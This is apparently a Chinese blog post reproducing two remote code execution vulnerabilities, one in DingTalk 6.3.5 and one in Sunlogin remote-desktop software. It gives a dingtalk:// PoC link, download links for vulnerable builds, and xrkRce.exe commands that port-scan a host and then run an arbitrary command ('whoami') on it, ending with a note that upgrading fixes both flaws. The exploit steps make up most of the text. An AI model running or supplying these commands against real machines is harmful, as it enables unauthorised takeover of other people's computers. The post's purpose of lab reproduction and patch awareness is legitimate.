钉钉RCE

1. 影响版本

6.3.5

2. poc

dingtalk://dingtalkclient/page/link?url=127.0.0.1/test.html&pc_slide=true

3. 本地使用hfs搭建服务

4. 下载受漏洞影响的版本

链接：https://pan.baidu.com/s/1ozrwoqjzwASgONavgc94OQ
提取码：9bcw 

登录该版本钉钉之后，直接发送poc而后点击即可触发

当然了，修复方式极其简单，升级为6.3.30即可（钉钉运行结束后会自动升级）

向日葵RCE 复现

1. 前往github下载受影响的版本

链接：https://pan.baidu.com/s/1O0EY-JRblNuGa8q3mfWxUQ 提取码：XVFD

https://github.com/Mr-xn/sunlogin_rce

2. 安装向日葵即可，版本如下

3. 运行xrkRce.exe工具，需要go环境

xrkRce.exe -h 192.168.43.157 -t scan -p 1-65535

获取可能存在的向日葵端口号

不知道为啥，我扫了三遍才扫到这个端口，所以其实有时候不是没开端口，而是没扫到，可能是受环境影响，所以若是大家扫不到，只需要确定一下向日葵是否开启，而后使用第二种方式去定位该端口号

进入命令行模式后，输入命令 tasklist 可获取正在运行的进程，找到向日葵的进程即可

可以看到，竟然有三个进程，我们查看第一个 30552

netatst -ano | findstr "30552"

顺利找到此端口

而后返回值exp下执行如下命令即可；现官方已修复该漏洞，升级到最新版本即可

xrkRce.exe -h 192.168.43.157 -t rce -p 28193 -c "whoami"